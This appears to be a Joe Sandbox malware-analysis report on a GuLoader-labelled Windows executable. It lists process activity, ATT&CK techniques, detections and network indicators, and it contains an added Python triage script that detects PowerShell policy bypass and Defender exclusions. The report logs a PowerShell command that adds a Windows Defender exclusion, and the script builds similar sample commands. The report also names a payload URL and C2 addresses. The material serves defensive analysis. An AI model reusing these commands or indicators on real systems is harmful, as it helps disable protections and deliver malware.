        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Process created: C:\Users\user\Desktop\yVVZdG2NJX.exe "C:\Users\user\Desktop\yVVZdG2NJX.exe"
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yVVZdG2NJX.exe'
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Queries volume information: C:\Users\user\Desktop\yVVZdG2NJX.exe VolumeInformation
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: yVVZdG2NJX.exe, 00000003.00000002.2615291891.00000000375EB000.00000004.00000020.00020000.00000000.sdmp, yVVZdG2NJX.exe, 00000003.00000002.2615291891.00000000375DC000.00000004.00000020.00020000.00000000.sdmp, yVVZdG2NJX.exe, 00000003.00000002.2589172205.0000000004248000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe WMI Queries (issued three times): IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
MITRE ATT&CK Matrix. For each tactic, the techniques the report flags are listed with the number shown on the matrix cell; the remaining, unflagged techniques of the rendered matrix follow in square brackets.

Reconnaissance: none flagged [Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies]
Resource Development: none flagged [Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless]
Initial Access: none flagged [Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise]
Execution: Windows Management Instrumentation (1); Native API (1); PowerShell (1) [Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job]
Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (2) [Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job]
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (11); Registry Run Keys / Startup Folder (2) [Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job]
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Masquerading (11); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (11)
Credential Access: none flagged [OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem]
Discovery: File and Directory Discovery (2); System Information Discovery (215); Security Software Discovery (321); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1) [Remote System Discovery, System Owner/User Discovery]
Lateral Movement: none flagged [Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services]
Collection: Archive Collected Data (1); Clipboard Data (1) [Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking]
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (12) [Multiband Communication, Commonly Used Port, Application Layer Protocol]
Exfiltration: none flagged [Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol]
Impact: System Shutdown/Reboot (1) [Network Denial of Service, Data Encrypted for Impact, Data Destruction, Service Stop, Inhibit System Recovery, Defacement]
Behavior Graph: ID 1561885; sample yVVZdG2NJX.exe; start date 24/11/2024; architecture WINDOWS; score 100
Graph-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 5 other signatures. Domain on the graph: mertvinc.com.tr.

Process tree (bracketed numbers are the created-registry-value / created-file counts as rendered on the graph nodes):
  yVVZdG2NJX.exe [2, 26]
    dropped: C:\Users\user\AppData\Local\...\System.dll (PE32)
    signatures: Bypasses PowerShell execution policy; Adds a directory exclusion to Windows Defender; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
    -> yVVZdG2NJX.exe [12]
         network: 87.121.86.8 (ports as rendered: 4020, 49821, 49878; SKATTV-ASBG, Bulgaria); mertvinc.com.tr = 185.244.144.68 (ports as rendered: 49776, 80; BIRBIRTR, Turkey)
         dropped: C:\Users\user\AppData\...\yVVZdG2NJX.exe (PE32)
         signatures: Adds a directory exclusion to Windows Defender
         -> powershell.exe [23] -> conhost.exe (signature: Loading BitLocker PowerShell Module)
         -> powershell.exe [23] -> conhost.exe
         -> powershell.exe [21] -> conhost.exe
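As an added triage example (not part of the Joe Sandbox report and not the sample's own code), the following Python decodes a PowerShell -EncodedCommand payload and flags the two behaviours the process tree above attributes to the powershell.exe children (an execution-policy bypass and a Windows Defender exclusion added via Add-MpPreference), and recognises the root\SecurityCenter2 AntivirusProduct query listed under the sample's WMI queries. The command lines are constructed for illustration; this page does not print the sample's real command lines, and the Base64-over-UTF-16LE encoding is assumed as the usual delivery form rather than taken from the report.

```python
"""Added triage helpers (not from the Joe Sandbox report): decode PowerShell
-EncodedCommand payloads, flag execution-policy bypass and Windows Defender
exclusion changes, and recognise the root\\SecurityCenter2 antivirus query.
All sample command lines below are CONSTRUCTED for illustration."""
import base64
import re
import shlex

# (Add|Set)-MpPreference followed, within the same statement, by an -Exclusion* parameter.
_MPPREF_EXCLUSION = re.compile(
    r"\b(?:Add|Set)-MpPreference\b[^|;]*?-Exclusion(?:Path|Process|Extension|IpAddress)\b",
    re.IGNORECASE,
)
# WQL against the SecurityCenter2 product classes. AntivirusProduct is the one the
# sample issued; AntiSpywareProduct and FirewallProduct are its siblings in that namespace.
_AV_DISCOVERY = re.compile(
    r"^\s*select\s+.+?\s+from\s+(?:AntiVirusProduct|AntiSpywareProduct|FirewallProduct)\b",
    re.IGNORECASE,
)


def _is_switch(tok, full, minlen, aliases=()):
    """powershell.exe accepts unambiguous prefixes of its switches (-enc, -ex, ...) and a
    few fixed aliases (-ep, -ec). Match `tok` against switch `full` under those rules."""
    if len(tok) < 2 or tok[0] not in "-/":
        return False
    name = tok[1:].lower()
    return name in aliases or (len(name) >= minlen and full.startswith(name))


def decode_encoded_command(b64):
    """-EncodedCommand payloads are Base64 over UTF-16LE text. Return None if not decodable."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_for_powershell(script):
    """Inverse of decode_encoded_command; used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def triage_powershell_cmdline(cmdline):
    """Return {'decoded': str|None, 'findings': set} for one powershell.exe command line."""
    toks = shlex.split(cmdline, posix=False)  # keep quotes and backslashes as Windows would
    findings, decoded = set(), None
    for i, tok in enumerate(toks):
        nxt = toks[i + 1].strip("'\"") if i + 1 < len(toks) else ""
        if _is_switch(tok, "executionpolicy", 2, aliases=("ep",)):
            if nxt.lower() in ("bypass", "unrestricted"):
                findings.add("execution_policy_bypass")
        elif _is_switch(tok, "encodedcommand", 1, aliases=("ec",)) and nxt:
            decoded = decode_encoded_command(nxt)
            if decoded is not None:
                findings.add("encoded_command")
    # The exclusion cmdlet may sit in the clear (-Command ...) or inside the decoded payload.
    if _MPPREF_EXCLUSION.search(cmdline) or (decoded and _MPPREF_EXCLUSION.search(decoded)):
        findings.add("defender_exclusion")
    return {"decoded": decoded, "findings": findings}


def is_av_discovery_query(namespace, wql):
    """True for the WMI query family this report lists: Select * from AntivirusProduct
    against root\\SecurityCenter2 (Security Software Discovery)."""
    return namespace.strip().lower() == r"root\securitycenter2" and bool(_AV_DISCOVERY.search(wql))


# Constructed sample command lines (NOT taken from the report).
EXCLUSION_SCRIPT = r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"
SAMPLE_PLAIN = r'powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "' + EXCLUSION_SCRIPT + '"'
SAMPLE_ENCODED = "powershell.exe -w hidden -ep bypass -enc " + encode_for_powershell(EXCLUSION_SCRIPT)
SAMPLE_BENIGN = "powershell.exe -NoProfile -Command Get-Date"

if __name__ == "__main__":
    for line in (SAMPLE_PLAIN, SAMPLE_ENCODED, SAMPLE_BENIGN):
        r = triage_powershell_cmdline(line)
        print(sorted(r["findings"]), "<-", line[:60])
        if r["decoded"]:
            print("   decoded:", r["decoded"])
    print(is_av_discovery_query(r"root\SecurityCenter2", "Select * from AntivirusProduct"))
```

The switch matching mirrors how powershell.exe resolves abbreviated parameters, so `-ep bypass -enc ...` is caught as readily as the spelled-out form; a rule that only matches the literal string `-ExecutionPolicy Bypass` misses the short spellings loaders typically use.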

Antivirus detection (Source / Detection / Scanner / Label)

Initial sample:
  yVVZdG2NJX.exe: 42% ReversingLabs (Win32.Trojan.Guloader); 100% Joe Sandbox ML
Dropped files:
  C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe: 100% Joe Sandbox ML; 42% ReversingLabs (Win32.Trojan.Guloader)
  C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll: 3% ReversingLabs
Unpacked PE files: no antivirus matches
Domains: no antivirus matches
URLs:
  http://mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin: 0% Avira URL Cloud (safe)
  http://crl.microv: 0% Avira URL Cloud (safe)
Domains (Name / IP / Active / Malicious / Antivirus detection / Reputation):
  mertvinc.com.tr / 185.244.144.68 / active: true / malicious: false / no AV detection / reputation: high
  s-part-0035.t-0009.t-msedge.net / 13.107.246.63 / active: true / malicious: false / no AV detection / reputation: high
Contacted URLs (Name / Malicious / Antivirus detection / Reputation):
  http://mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin / malicious: false / Avira URL Cloud: safe / reputation: unknown
URLs from memory and binaries (Name / Source / Malicious / Antivirus detection / Reputation):
  http://nuget.org/NuGet.exe | powershell.exe, 00000005.00000002.1743227140.00000000059A8000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.1778393165.0000000006048000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
  http://crl.micro | powershell.exe, 0000000A.00000002.1823896104.00000000077D0000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
  http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
  http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000005.00000002.1740597554.0000000004A96000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.1769636888.0000000005136000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
  https://aka.ms/pscore6lB | powershell.exe, 00000005.00000002.1740597554.0000000004941000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.1769636888.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000A.00000002.1806582406.0000000004B91000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
  http://crl.microsoft | powershell.exe, 00000005.00000002.1748126062.0000000008205000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 0000000A.00000002.1833557916.0000000008756000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
  http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
  https://go.micro | powershell.exe, 0000000A.00000002.1806582406.00000000054B6000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000A.00000002.1806582406.00000000052F8000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
  http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000005.00000002.1740597554.0000000004A96000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.1769636888.0000000005136000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
  https://contoso.com/ | powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
  https://nuget.org/nuget.exe | powershell.exe, 00000005.00000002.1743227140.00000000059A8000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.1778393165.0000000006048000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
  https://contoso.com/License | powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
  https://contoso.com/Icon | powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
  http://www.microsoft. | powershell.exe, 00000008.00000002.1785903689.0000000008A97000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
  http://nsis.sf.net/NSIS_ErrorError | yVVZdG2NJX.exe; yVVZdG2NJX.exe.3.dr | malicious: false | reputation: high
  http://crl.microv | powershell.exe, 00000005.00000002.1745481577.00000000072F0000.00000004.00000020.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | yVVZdG2NJX.exe, 00000003.00000002.2609686663.00000000345A1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.1740597554.0000000004941000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.1769636888.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000A.00000002.1806582406.0000000004B91000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
  https://github.com/Pester/Pester | powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
Contacted IPs (IP / Domain / Country / ASN / ASN name / Malicious):
  185.244.144.68 / mertvinc.com.tr / Turkey / 199608 / BIRBIRTR / malicious: false
  87.121.86.8 / unknown / Bulgaria / 34577 / SKATTV-ASBG / malicious: true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561885
Start date and time: 2024-11-24 16:36:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
